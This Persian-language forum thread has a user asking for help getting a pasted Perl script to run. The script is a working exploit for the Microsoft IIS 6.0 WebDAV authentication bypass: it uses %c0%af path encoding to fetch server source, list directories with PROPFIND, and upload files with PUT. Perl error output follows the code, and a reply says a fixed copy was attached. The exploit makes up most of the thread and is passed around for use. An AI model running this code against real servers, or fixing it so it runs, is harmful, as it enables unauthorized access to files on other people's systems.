اطلاعیه

Collapse
No announcement yet.

مشکل در perl

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • مشکل در perl

    سلام من خواستم این فایل پرل رو Run کنم ولی موفق نشدم
    Warrning ها رو هم search کردم اما باز چیزی متوحه نشدم
    بنظرم باید کسی که perl می دونه یک بار source رو Trace کنه
    # Title: Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl)
    # EDB-ID: 8806
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: ka0x
    # Published: 2009-05-26
    # Verified: yes
    # Download Exploit Code
    # Download N/A

    view source

    print?
    #!/usr/bin/perl -W
    #
    # Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
    # written by ka0x <ka0x01[alt+64]gmail.com>
    # Advisory: http://www.milw0rm.com/exploits/8765
    #
    # Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!

    use IO::Socket ;

    my ( $host, $path ) = @ARGV ;
    my $port = 80 ; # webserver port

    &usage unless $ARGV[1] ;

    $host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
    $path =~ s/\/// if(substr($path, 0,1) eq '/');

    sub _file {
    $file = shift ;
    open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
    while( <FILE> ){
    $cont .= $_ ;
    }
    close(FILE) ;
    return $cont ;
    }


    print "write 'help' for get help list\n";


    while( 1 ) {

    my $sock = IO::Socket::INET->new (PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
    print "\$> ";
    chomp( my $option = <STDIN> ) ;
    last if $option eq 'quit' ;

    if($option eq 'source') {
    $path =~ s/\//%c0%af\// ;
    print $sock "GET /".$path." HTTP/1.1\r\n" ;
    print $sock "Translate: f\r\n" ;
    print $sock "Host: ".$host."\r\n" ;
    print $sock "Connection: close\r\n\r\n" ;

    while(<$sock>){
    print $_ ;
    }
    close($sock) ;
    }


    elsif($option eq 'path') {
    $path =~ s/\//%c0%af\// ;
    print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
    print $sock "Host: ".$host."\r\n" ;
    print $sock "Connection:close\r\n" ;
    print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
    print $sock "Content-Length: 0\r\n\r\n" ;
    print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;

    while(<$sock>){
    print $_ ;
    }
    close($sock) ;
    }


    elsif($option eq 'put') {
    $path =~ s/\//%c0%af\// ;
    print "[*] Insert a local file (ex: /root/file.txt): " ;
    chomp( $local = <STDIN> ) ;
    $file_l = _file( $local ) ;
    print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
    print $sock "Host: ".$host."\r\n" ;
    print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
    print $sock "Connection:close\r\n" ;
    print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
    print $sock $file_l,"\r\n" ;

    while(<$sock>){
    print $_ ;
    }
    close($sock) ;
    }

    elsif($option eq 'help') {
    print "\n\t\t- OPTIONS -\n\n\n" ;
    print "\thelp\t\tgive this help list\n" ;
    print "\tsource\t\tget file content\n" ;
    print "\tpath\t\tget directory contents\n" ;
    print "\tput\t\tput file\n" ;
    print "\tquit\t\texit exploit\n\n" ;
    }

    }

    sub usage {
    print << 'EOH' ;

    $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
    $ written by ka0x <ka0x01[at]gmail.com>
    $ 25/05/2009

    usage:
    perl $0 <host> <path>

    example:
    perl $0 localhost dir/
    perl $0 localhost dir/file.txt

    EOH

    exit;
    }




    __END__

    # milw0rm.com [2009-05-26]
    و warrning ها :
    H:\perl\bin>perl h:\1.pl
    Bareword found where operator expected at h:\1.pl line 76, near "print $sock '<
    ?xml"
    (Might be a runaway multi-line ?? string starting on line 13)
    (Do you need to predeclare print?)
    Bareword found where operator expected at h:\1.pl line 76, near ""1.0" encoding"

    (Missing operator before encoding?)
    syntax error at h:\1.pl line 76, near "print $sock '<?xml version"
    Bad name after put' at h:\1.pl line 85.
    Last edited by irph; 02-05-2010, 12:25 PM.

  • #2
    بیا برات پیوست کردم.

    عجب بدبختی شده با این سرعت گوگل هم باز نمیشه
    فایل های پیوست شده
    sigpic

    Comment


    • #3
      نوشته اصلی توسط black.spook نمایش پست ها
      بیا برات پیوست کردم.

      عجب بدبختی شده با این سرعت گوگل هم باز نمیشه
      دستت درد نکنه
      ان شاء ا... سرعت اینترنتت فضایی بشه

      Comment

      Working...
      X